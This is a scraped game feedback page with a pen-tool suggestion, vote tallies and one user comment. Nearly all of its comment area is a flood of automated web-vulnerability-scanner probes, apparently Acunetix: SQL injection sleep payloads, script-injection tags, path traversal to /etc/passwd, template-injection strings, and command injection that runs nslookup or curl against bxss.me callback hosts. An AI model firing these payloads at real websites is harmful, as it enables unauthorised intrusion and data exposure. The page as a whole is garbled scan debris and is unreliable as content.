Feedback
Submit suggestionPen tool by Cblackdragon - 149 months ago
Instead of using lines, freehand! ^.^
8065 agree
2858 agree
799 agree
772 agree
747 agree
746 agree
710 agree
681 agree
661 agree
661 agree
645 agree
632 agree
623 agree
622 agree
603 agree
592 agree
590 agree
579 agree
579 agree
572 agree
566 agree
565 agree
564 agree
564 agree
558 agree
553 agree
523 agree
522 agree
519 agree
511 agree
506 agree
498 agree
496 agree
493 agree
490 agree
488 agree
483 agree
479 agree
477 agree
469 agree
467 agree
465 agree
462 agree
461 agree
455 agree
455 agree
442 agree
434 agree
432 agree
420 agree
Amarnes
I agree. It would help us bad creators because then we could make better ships and we could KICK MORE ASS!!!!!!!lxbfYeaa
1lxbfYeaa
1lxbfYeaa
1Testing
1JJJ3QQQ
JJJ30QQQWfxYANoW
1WfxYANoW
1Brx76yT6IOWfxYANoW
1<esi:include src="http://bxss.me/rpb.png"/>1rlaZ0miAO
1WfxYANoW
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpgWfxYANoW
../../../../../../../../../../../../../../etc/passwdWfxYANoW
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs�.jpgWfxYANoW
../../../../../../../../../../../../../../windows/win.iniWfxYANoW
file:///etc/passwdWfxYANoW
${10000092+9999370}Anonymous
1WfxYANoW
Http://bxss.me/t/fit.txtWfxYANoW
http://bxss.me/t/fit.txt?.jpg${10000185+10000463}
1WfxYANoW
response.write(9103188*9838949)WfxYANoW
echo gxczlu$()\ shholn\nz^xyu||a #' &echo gxczlu$()\ shholn\nz^xyu||a #|" &echo gxczlu$()\ shholn\nz^xyu||a #WfxYANoW
Aed1vi1EWfxYANoW
1WfxYANoW
mEll9sTl: 3opwmnoJWfxYANoW
'+response.write(9103188*9838949)+'WfxYANoW
../1WfxYANoW
"+response.write(9103188*9838949)+"WfxYANoW
/etc/shellsWfxYANoW
1&n951634=v909662BKOKb9b0
1response.write(9377602*9400131)
1WfxYANoW
&echo trpwhv$()\ wwrrqp\nz^xyu||a #' &echo trpwhv$()\ wwrrqp\nz^xyu||a #|" &echo trpwhv$()\ wwrrqp\nz^xyu||a #file:///etc/passwd
1WfxYANoW
1&echo frpcwa$()\ efvmko\nz^xyu||a #' &echo frpcwa$()\ efvmko\nz^xyu||a #|" &echo frpcwa$()\ efvmko\nz^xyu||a #'+response.write(9377602*9400131)+'
1WfxYANoW
../../../../../../../../../../../../../../etc/shellsWfxYANoW
1WfxYANoW
|echo bbuuox$()\ gfganp\nz^xyu||a #' |echo bbuuox$()\ gfganp\nz^xyu||a #|" |echo bbuuox$()\ gfganp\nz^xyu||a #WfxYANoW
c:/windows/win.ini"+response.write(9377602*9400131)+"
1wsjXaX4H: JBo6inHA
1WfxYANoW
bxss.me../WfxYANoW
1WfxYANoW&n951187=v904543
11yrphmgdpgulaszriylqiipemefmacafkxycjaxjs�.jpg
1WfxYANoW
'.gethostbyname(lc('hitwx'.'ibhbqrup75050.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(120).chr(77).chr(112).chr(68).'WfxYANoW
1|echo guvbdf$()\ zgmddz\nz^xyu||a #' |echo guvbdf$()\ zgmddz\nz^xyu||a #|" |echo guvbdf$()\ zgmddz\nz^xyu||a #WfxYANoW
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));WfxYANoW
".gethostbyname(lc("hitgm"."zdjjqcio170f1.bxss.me."))."A".chr(67).chr(hex("58")).chr(109).chr(76).chr(121).chr(89)."WfxYANoW
';print(md5(31337));$a='Http://bxss.me/t/fit.txt
1WfxYANoW
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))WfxYANoW
)WfxYANoW
";print(md5(31337));$a="WfxYANoW
(nslookup -q=cname hitnoxggzpltha3dac.bxss.me||curl hitnoxggzpltha3dac.bxss.me))WfxYANoW
gethostbyname(lc('hitli'.'nwvnddzqae094.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(111).chr(76).chr(122).chr(80)WfxYANoW
${@print(md5(31337))}http://bxss.me/t/fit.txt?.jpg
1cGpCbHBFblE=
1WfxYANoW
1/etc/shells
1WfxYANoW
!(()&&!|*|*|WfxYANoW
^(#$!@#$)(()))******WfxYANoW
xfs.bxss.meWfxYANoW
${@print(md5(31337))}\xfs.bxss.me
1)
1c:/windows/win.ini
1WfxYANoW
'"()!(()&&!|*|*|
1WfxYANoW
'.print(md5(31337)).'WfxYANoW
1'&&sleep(27*1000)*scyrlu&&'WfxYANoW
HttP://bxss.me/t/xss.html?%00bxss.me
1WfxYANoW
1WfxYANoW
'"WfxYANoW
"+"A".concat(70-3).concat(22*4).concat(101).concat(65).concat(118).concat(83)+(require"socket" Socket.gethostbyname("hitcf"+"uyeruszt9e19b.bxss.me.")[3].to_s)+"WfxYANoW
1'"()&%<zzz><ScRiPt >1ea5(9544)</ScRiPt>^(#$!@#$)(()))******
1WfxYANoW
'+'A'.concat(70-3).concat(22*4).concat(117).concat(79).concat(99).concat(81)+(require'socket' Socket.gethostbyname('hityo'+'benkvwno23b46.bxss.me.')[3].to_s)+'WfxYANoW
$(nslookup -q=cname hitifujrkjxtg5ad0a.bxss.me||curl hitifujrkjxtg5ad0a.bxss.me)WfxYANoW
<!--WfxYANoW
comment'"
1<!--
1WfxYANoW
&nslookup -q=cname hitgpchzsfgyq3c0ce.bxss.me&'\"`0&nslookup -q=cname hitgpchzsfgyq3c0ce.bxss.me&`'WfxYANoW
bxss.me/t/xss.html?%00WfxYANoW
1"&&sleep(27*1000)*xgcuvr&&"HttP://bxss.me/t/xss.html?%00
1WfxYANoW
comment�WfxYANoW
'A'.concat(70-3).concat(22*4).concat(98).concat(69).concat(102).concat(68)+(require'socket' Socket.gethostbyname('hitdy'+'vbhdchmw8da5b.bxss.me.')[3].to_s)WfxYANoW
comment/.WfxYANoW
'"()&%<zzz><ScRiPt >1ea5(9451)</ScRiPt>WfxYANoW
&(nslookup -q=cname hitxlrtuurkhs632b2.bxss.me||curl hitxlrtuurkhs632b2.bxss.me)&'\"`0&(nslookup -q=cname hitxlrtuurkhs632b2.bxss.me||curl hitxlrtuurkhs632b2.bxss.me)&`'WfxYANoW
1'||sleep(27*1000)*gpminq||'WfxYANoW
|(nslookup -q=cname hitfwxywiouqa3da01.bxss.me||curl hitfwxywiouqa3da01.bxss.me)WfxYANoW
1"||sleep(27*1000)*bycznq||"comment
1comment�
1WfxYANoW
1comment/.
1';print(md5(31337));$a='
1WfxYANoW
19537766bxss.me/t/xss.html?%00
1WfxYANoW
`(nslookup -q=cname hitgdqtvwqzeo96b49.bxss.me||curl hitgdqtvwqzeo96b49.bxss.me)`";print(md5(31337));$a="
1'"()
1${@print(md5(31337))}
1WfxYANoW
;(nslookup -q=cname hitzzpabkuypw0269f.bxss.me||curl hitzzpabkuypw0269f.bxss.me)|(nslookup -q=cname hitzzpabkuypw0269f.bxss.me||curl hitzzpabkuypw0269f.bxss.me)&(nslookup -q=cname hitzzpabkuypw0269f.bxss.me||curl hitzzpabkuypw0269f.bxss.me)WfxYANoW'&&sleep(27*1000)*ejcsbu&&'
1${@print(md5(31337))}\
1'.print(md5(31337)).'
1WfxYANoW
|(nslookup${IFS}-q${IFS}cname${IFS}hitabnvfdzkxo98969.bxss.me||curl${IFS}hitabnvfdzkxo98969.bxss.me)WfxYANoW"&&sleep(27*1000)*mltyor&&"
1WfxYANoW
bfg4103<s1﹥s2ʺs3ʹhjl4103WfxYANoW
&(nslookup${IFS}-q${IFS}cname${IFS}hitcxgokuwwfx709cc.bxss.me||curl${IFS}hitcxgokuwwfx709cc.bxss.me)&'\"`0&(nslookup${IFS}-q${IFS}cname${IFS}hitcxgokuwwfx709cc.bxss.me||curl${IFS}hitcxgokuwwfx709cc.bxss.me)&`'WfxYANoW'||sleep(27*1000)*vrmubd||'
1WfxYANoW"||sleep(27*1000)*ibaleu||"
1WfxYANoW
<%={{={@{#{${dfb}}%>WfxYANoW
<th:t="${dfb}#foreachWfxYANoW
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>WfxYANoW
1WfxYANoW
dfb{{98991*97996}}xcaWfxYANoW
dfb[[${98991*97996}]]xcaWfxYANoW
dfb__${98991*97996}__::.xWfxYANoW
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")WfxYANoW
1<ScRiPt >1ea5(9802)</ScRiPt>WfxYANoW
1<WNSY7H>EESQM[!+!]</WNSY7H>WfxYANoW
1<script>1ea5(9536)</script>WfxYANoW
1<script>1ea5(9384)</script>9384WfxYANoW
1<ScR<ScRiPt>IpT>1ea5(9847)</sCr<ScRiPt>IpT>WfxYANoW
1<ScRiPt >1ea5(9375)</ScRiPt>WfxYANoW
1<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9355></ScRiPt>WfxYANoW
14Kp2AjEAWfxYANoW
1<�ScRiPt >1ea5(9322)</ScRiPt>WfxYANoW
1<isindex type=image src=1 onerror=1ea5(9446)>WfxYANoW
1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9910'>WfxYANoW
1<body onload=1ea5(9089)>WfxYANoW
1<img src=//xss.bxss.me/t/dot.gif onload=1ea5(9268)>WfxYANoW
1<img src=xyz OnErRor=1ea5(9279)>WfxYANoW
1<img/src=">" onerror=alert(9436)>WfxYANoW
%31%3C%53%63%52%69%50%74%20%3E%31%65%61%35%289143%29%3C%2F%73%43%72%69%70%54%3EWfxYANoW
1\u003CScRiPt\1ea5(9324)\u003C/sCripT\u003EWfxYANoW
1<ScRiPt>1ea5(9063)</sCripT>WfxYANoW
1WfxYANoW
-1 OR 2+23-23-1=0+0+0+1 --WfxYANoW
1<input autofocus onfocus=1ea5(9015)>WfxYANoW
-1 OR 2+48-48-1=0+0+0+1WfxYANoW
<a HrEF=http://xss.bxss.me></a>WfxYANoW
-1' OR 2+790-790-1=0+0+0+1 --WfxYANoW
<a HrEF=jaVaScRiPT:>WfxYANoW
-1' OR 2+234-234-1=0+0+0+1 or '2j9NunZC'='WfxYANoW
1}body{zzz:Expre/**/SSion(1ea5(9985))}WfxYANoW
-1" OR 2+809-809-1=0+0+0+1 --WfxYANoW
1jrelU <ScRiPt >1ea5(9732)</ScRiPt>WfxYANoW
1<WEGFSY>CEI64[!+!]</WEGFSY>WfxYANoW
1<ifRAme sRc=9696.com></IfRamE>WfxYANoW
1<asHCJvg x=9466>WfxYANoW
1<img sRc='http://attacker-9222/log.php?WfxYANoW
1<arXJrMc<WfxYANoW'"()&%<zzz><ScRiPt >1ea5(9355)</ScRiPt>
1'"()&%<zzz><ScRiPt >1ea5(9380)</ScRiPt>
1WfxYANoW
1*if(now()=sysdate(),sleep(15),0)WfxYANoW9888241
1bfg1812<s1﹥s2ʺs3ʹhjl1812
1<%={{={@{#{${dfb}}%>
1<th:t="${dfb}#foreach
11}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
1dfb{{98991*97996}}xca
1dfb[[${98991*97996}]]xca
1WfxYANoW
10'XOR(1*if(now()=sysdate(),sleep(15),0))XOR'Zdfb__${98991*97996}__::.x
1"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
1WfxYANoW<ScRiPt >1ea5(9123)</ScRiPt>
1WfxYANoW<W22NUO>TJULE[!+!]</W22NUO>
1WfxYANoW<script>1ea5(9060)</script>
1WfxYANoW<script>1ea5(9387)</script>9387
1WfxYANoW<ScRiPt >1ea5(9915)</ScRiPt>
1WfxYANoW<�ScRiPt >1ea5(9975)</ScRiPt>
1WfxYANoW
10"XOR(1*if(now()=sysdate(),sleep(15),0))XOR"ZWfxYANoW<body onload=1ea5(9146)>
1WfxYANoW<img src=xyz OnErRor=1ea5(9711)>
1WfxYANoW<img/src=">" onerror=alert(9699)>
1WfxYANoW\u003CScRiPt\1ea5(9666)\u003C/sCripT\u003E
1WfxYANoW
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/WfxYANoW<ScRiPt>1ea5(9486)</sCripT>
1WfxYANoW<input autofocus onfocus=1ea5(9731)>
1<a HrEF=http://xss.bxss.me></a>
1<a HrEF=jaVaScRiPT:>
1WfxYANoW}body{zzz:Expre/**/SSion(1ea5(9347))}
1WfxYANoWGxIBq <ScRiPt >1ea5(9269)</ScRiPt>
1WfxYANoW<WQRUEC>RNZXU[!+!]</WQRUEC>
1WfxYANoW<ifRAme sRc=9345.com></IfRamE>
1WfxYANoW<aO46CQ3 x=9665>
1WfxYANoW<img sRc='http://attacker-9841/log.php?
1WfxYANoW<aKU3pFY<
1WfxYANoW
1-1; waitfor delay '0:0:15' --WfxYANoW
1-1); waitfor delay '0:0:15' --WfxYANoW
1-1 waitfor delay '0:0:15' --WfxYANoW
1PopKAlyJ'; waitfor delay '0:0:15' --WfxYANoW
1-1 OR 810=(SELECT 810 FROM PG_SLEEP(15))--WfxYANoW
1-1) OR 568=(SELECT 568 FROM PG_SLEEP(15))--WfxYANoW
1-1)) OR 245=(SELECT 245 FROM PG_SLEEP(15))--WfxYANoW
1EXOefOYB' OR 939=(SELECT 939 FROM PG_SLEEP(15))--WfxYANoW
1yqK26247') OR 382=(SELECT 382 FROM PG_SLEEP(15))--WfxYANoW
1gn7jRSCi')) OR 195=(SELECT 195 FROM PG_SLEEP(15))--WfxYANoW
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)WfxYANoW
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'WfxYANoW
1'"WfxYANoW
@@EuziDWfxYANoW
1WfxYANoW
1WfxYANoWFGxRI0pP
1WfxYANoW
1-1 OR 2+553-553-1=0+0+0+1 --
1-1 OR 2+495-495-1=0+0+0+1
1-1' OR 2+663-663-1=0+0+0+1 --
1-1' OR 2+221-221-1=0+0+0+1 or 'pNWHuhFO'='
1-1" OR 2+318-318-1=0+0+0+1 --
1if(now()=sysdate(),sleep(15),0)
1WfxYANoW-1 waitfor delay '0:0:15' --
1WfxYANoWe2L5sBsL'; waitfor delay '0:0:15' --
1WfxYANoW'"
1@@Es631
1Pecedec150
555-555-0199@example.comPecedec150
555-555-0199@example.comubaTaeCJ
1User #246063
1lhpamyml
1vqfwwfow
response.write(9922406*9771365)ndjjwrpt
1vqfwwfow
'+response.write(9922406*9771365)+'ndjjwrpt
1vqfwwfow
"+response.write(9922406*9771365)+"ndjjwrpt
y5431K88response.write(9144373*9775273)
1ucaaokxn
set|set&setndjjwrpt
-1 OR 2+333-333-1=0+0+0+1 --'+response.write(9144373*9775273)+'
1ucaaokxn
$(nslookup zvX1AG9D)vbwxvula
RtHTP9Pindjjwrpt
-1 OR 2+530-530-1=0+0+0+1"+response.write(9144373*9775273)+"
1ucaaokxn
&nslookup une7pDCa&'\"`0&nslookup une7pDCa&`'ipHVV1vB
1ndjjwrpt
-1' OR 2+797-797-1=0+0+0+1 --bccyhrnv
../../../../../../../../../../etc/passwdeddgcwql
1set|set&set
1mjdaeemj
${9999645+10000325}ndjjwrpt
-1' OR 2+40-40-1=0+0+0+1 or 'HRTrmj1r'='bccyhrnv
../../../../../../../../../../../../../../../proc/versionuhbqoqxy
http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg$(nslookup PowORCmp)
1${10000105+10000205}
1ndjjwrpt
-1" OR 2+974-974-1=0+0+0+1 --bccyhrnv
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpguhbqoqxy
1some_inexistent_file_with_long_name�.jpg&nslookup sTwSgrsB&'\"`0&nslookup sTwSgrsB&`'
1aVZSdDR3Y0c=
1kmdmgeue
1&n952036=v943931ndjjwrpt
if(now()=sysdate(),sleep(4),0)/*'XOR(if(now()=sysdate(),sleep(4),0))OR'"XOR(if(now()=sysdate(),sleep(4),0))OR"*/bccyhrnv
../../../../../../../../../../etc/passwd�.jpguhbqoqxy
Http://testasp.vulnweb.com/t/fit.txtjbrnfipp
)ndjjwrpt
if(now()=sysdate(),sleep(12),0)/*'XOR(if(now()=sysdate(),sleep(12),0))OR'"XOR(if(now()=sysdate(),sleep(12),0))OR"*/bccyhrnv
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpguhbqoqxy
http://testasp.vulnweb.com/t/fit.txt?.jpgeddgcwql
1jbrnfipp
!(()&&!|*|*|cubkijrm
'"()fdnvbvhq&n963919=v942756
1ndjjwrpt
(select(0)from(select(sleep(8)))v)/*'+(select(0)from(select(sleep(8)))v)+'"+(select(0)from(select(sleep(8)))v)+"*/bccyhrnv
/../..//../..//../..//../..//../..//etc/passwd�.jpguhbqoqxy
testasp.vulnweb.comAnonymous
1jbrnfipp
^(#$!@#$)(()))******ndjjwrpt
-1; waitfor delay '0:0:8' --bccyhrnv
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd)
1'"()
1injeibjt
;print(md5(acunetix_wvs_security_test));ndjjwrpt
-1); waitfor delay '0:0:8' --bccyhrnv
/etc/passwd1some_inexistent_file_with_long_name�.jpg
1!(()&&!|*|*|
1jacsjabb
http://testasp.vulnweb.com/t/xss.html?%00.jpginjeibjt
';print(md5(acunetix_wvs_security_test));$a='ndjjwrpt
1 waitfor delay '0:0:8' --bccyhrnv
%2fetc%2fpasswdHttp://testasp.vulnweb.com/t/fit.txt
1mhwambai
1^(#$!@#$)(()))******
1http://testasp.vulnweb.com/t/xss.html?%00.jpg
1injeibjt
";print(md5(acunetix_wvs_security_test));$a="ndjjwrpt
5LfuGYga'; waitfor delay '0:0:8' --bccyhrnv
/.././.././.././.././.././.././.././../etc/./passwd%00http://testasp.vulnweb.com/t/fit.txt?.jpg
1mhwambai
commentvqtrnlrd
http://hitmZx3YsH2lJ.bxss.me/ejdjuptb
1injeibjt
${@print(md5(acunetix_wvs_security_test))}ndjjwrpt
-1;select pg_sleep(8); --bccyhrnv
../..//../..//../..//../..//../..//../..//../..//../..//etc/passwdtestasp.vulnweb.com
1mhwambai
comment�ejdjuptb
1'"http://hitXTLHI3nYr0.bxss.me/
1injeibjt
${@print(md5(acunetix_wvs_security_test))}\ndjjwrpt
-1);select pg_sleep(12); --bccyhrnv
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwdevgubykc
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))mhwambai
comment/.ejdjuptb
\spqaehrq
/www.vulnweb.com;print(md5(acunetix_wvs_security_test));
1ndjjwrpt
-1));select pg_sleep(12); --mhwambai
1/www.vulnweb.com
1';print(md5(acunetix_wvs_security_test));$a='
1ndjjwrpt
dbTcyEdC';select pg_sleep(12); --bccyhrnv
invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.tmsyomes
'"comment
1ejdjuptb
@@FJ03gcrtymxei
1'"()&%<acx><ScRiPt >eRkl(9315)</ScRiPt>";print(md5(acunetix_wvs_security_test));$a="
1ndjjwrpt
QWwrKxCx');select pg_sleep(12); --bccyhrnv
file:///etc/passwdtmsyomes
<!--comment�
1ejdjuptb
JyI=${@print(md5(acunetix_wvs_security_test))}
1ndjjwrpt
zXsRACfR'));select pg_sleep(12); --bccyhrnv
/\../\../\../\../\../\../\../etc/passwd'"
1comment/.
1crtymxei
'"()&%<acx><ScRiPt >eRkl(9257)</ScRiPt>${@print(md5(acunetix_wvs_security_test))}\
1ndjjwrpt
1bccyhrnv
WEB-INF/web.xml<!--
1ndjjwrpt
1bccyhrnv
/WEB-INF/web.xmlejdjuptb
(select convert(int,CHAR(65)))crtymxei
1_9072MWyfP91G
1bccyhrnv
WEB-INF\web.xmlejdjuptb
1-1 OR 2+589-589-1=0+0+0+1 --
1../../../../../../../../../../etc/passwd
11'"
1-1 OR 2+57-57-1=0+0+0+1
1crtymxei
acu5084<s1﹥s2ʺs3ʹuca5084\
1-1' OR 2+266-266-1=0+0+0+1 --
1-1' OR 2+347-347-1=0+0+0+1 or 'DuM5h9yd'='
1../../../../../../../../../../etc/passwd�.jpg
1@@KYePM
1-1" OR 2+63-63-1=0+0+0+1 --
1JyI=
1crtymxei
{{10000134*9999466}}.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
11 waitfor delay '0:0:7' --
1/etc/passwd
1crtymxei
1<ScRiPt >eRkl(9420)</ScRiPt>(select convert(int,CHAR(65)))
1Ojx4VkJq'; waitfor delay '0:0:7' --
1%2fetc%2fpasswd
1xaQxJzeE';select pg_sleep(15); --
1crtymxei
1<WOY1IA>PKYSY[!+!]</WOY1IA>rzdBzhuY');select pg_sleep(15); --
1uEr4GcPw'));select pg_sleep(15); --
1crtymxei
1<script>eRkl(9583)</script>crtymxei
1<ScR<ScRiPt>IpT>eRkl(9275)</sCr<ScRiPt>IpT>file:///etc/passwd
1crtymxei
1<ScRiPt >eRkl(9265)</ScRiPt>/\../\../\../\../\../\../\../etc/passwd
1WEB-INF/web.xml
1crtymxei
1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?9613></ScRiPt>/WEB-INF/web.xml
1WEB-INF\web.xml
1crtymxei
1<�ScRiPt >eRkl(9968)</ScRiPt>crtymxei
1<video><source onerror="javascript:eRkl(9541)">crtymxei
1<isindex type=image src=1 onerror=eRkl(9091)>crtymxei
1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9121'>crtymxei
1<body onload=eRkl(9024)>crtymxei
1<img src=//testasp.vulnweb.com/t/dot.gif onload=eRkl(9119)>crtymxei
1<img src=xyz OnErRor=eRkl(9623)>crtymxei
1<img/src=">" onerror=alert(9517)>crtymxei
%31%3C%53%63%52%69%50%74%20%3E%65%52%6B%6C%289352%29%3C%2F%73%43%72%69%70%54%3Ecrtymxei
1\u003CScRiPt\eRkl(9110)\u003C/sCripT\u003Ecrtymxei
1<ScRiPt>eRkl(9866)</sCripT>crtymxei
1<input autofocus onfocus=eRkl(9020)>crtymxei
<a HrEF=http://www.vulnweb.com></a>crtymxei
<a HrEF=jaVaScRiPT:>crtymxei
[url=http://www.vulnweb.com][/url]crtymxei
1<img<!-- --> src=x onerror=alert(9157);//><!-- -->crtymxei
1}body{acu:Expre/**/SSion(eRkl(9024))}crtymxei
1<% contenteditable onresize=eRkl(9252)>crtymxei
1_bNF93 <ScRiPt >eRkl(9367)</ScRiPt>crtymxei
1<WJL6WS>CBLSA[!+!]</WJL6WS>crtymxei
1<ifRAme sRc=9324.com></IfRamE>crtymxei
1<UJTmEi x=9529>crtymxei
1<img sRc='http://attacker-9485/log.php?crtymxei'"()&%<acx><ScRiPt >eRkl(9233)</ScRiPt>
1'"()&%<acx><ScRiPt >eRkl(9057)</ScRiPt>
1crtymxei_9192
1acu5780<s1﹥s2ʺs3ʹuca5780
1{{10000374*10000495}}
1crtymxei<ScRiPt >eRkl(9567)</ScRiPt>
1crtymxei<W4RRU7>M3WWE[!+!]</W4RRU7>
1crtymxei<script>eRkl(9329)</script>
1crtymxei<ScRiPt >eRkl(9689)</ScRiPt>
1crtymxei<�ScRiPt >eRkl(9420)</ScRiPt>
1crtymxei<body onload=eRkl(9844)>
1crtymxei<img src=xyz OnErRor=eRkl(9239)>
1crtymxei<img/src=">" onerror=alert(9553)>
1crtymxei\u003CScRiPt\eRkl(9036)\u003C/sCripT\u003E
1crtymxei<ScRiPt>eRkl(9649)</sCripT>
1crtymxei<input autofocus onfocus=eRkl(9513)>
1<a HrEF=http://www.vulnweb.com></a>
1<a HrEF=jaVaScRiPT:>
1[url=http://www.vulnweb.com][/url]
1crtymxei}body{acu:Expre/**/SSion(eRkl(9867))}
1crtymxei<% contenteditable onresize=eRkl(9640)>
1crtymxei_tppSm <ScRiPt >eRkl(9614)</ScRiPt>
1crtymxei<WOHOOG>9EFFQ[!+!]</WOHOOG>
1crtymxei<ifRAme sRc=9565.com></IfRamE>
1crtymxei<unq45i x=9715>
1crtymxei<img sRc='http://attacker-9304/log.php?
1Comment